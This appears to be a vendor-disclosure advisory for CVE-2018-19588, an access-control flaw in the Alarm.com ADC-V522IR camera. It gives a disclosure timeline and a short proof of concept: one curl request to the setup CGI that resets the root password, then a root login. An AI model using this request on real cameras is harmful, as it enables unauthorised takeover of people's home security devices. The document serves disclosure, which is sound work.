[ services ]
[ about ]
[ legal ]

Responsible Disclosure

1. Vulnerability Details.

Title: CVE-2018-19588: Alarm.com ADC-V522IR 0100b9 Incorrect access controls.

Affected Vendor: Alarm.com

Affected Product: ADC-V522IR

Affected Version: 0100b9, potentially others

Platform: Embedded Linux

Impact: Privilege Escalation

Attack vector: HTTP

CVE ID: CVE-2018-19588, CVE-2019-9657

2. Vulnerability Description.

Any user with access to the Alarm.com camera can access the web administration console.

3. Technical Description.

Alarm.com did not sanatize Vivotek's commands to ensure the root password could not be altered upon setup of the camera through the web administration interface. By sending the below request to the wifi setup process, the attacker has effectively reset the root password and is now given access to the camera. This allows the attacker to change and alter any of the preconfigured settings. In addition, it allows the attacker to download and restore a backup of the /etc/ directory that is customized for Alarm.com configuration.

4. Mitigation and Remediation Recommendation

Vendor is working on an update.

5. Credits

VFX Team.

6. Disclosure Timeline

Jul 12, 2019 - Vendor responded.

Jul 9, 2019 - Published.

Mar 8, 2019 - Vendor responded, but did not have any additional information.

Jan 2, 2019 - Vendor contacted.

Dec 7, 2018 - Vendor contacted.

Nov 26, 2018 - Proof of concept disclosed to vendor.

Oct 22, 2018 - Vendor contacted.

7. Proof of Concept

Connect to the camera wifi on setup.

curl -v http://192.168.1.1/cgi-bin/admin/setparam.cgi?security_user_i0_pass=password

Connect camera to ethernet.

Login as root/password.

© 2002-2024 VFX Computing, Inc. All Rights Reserved.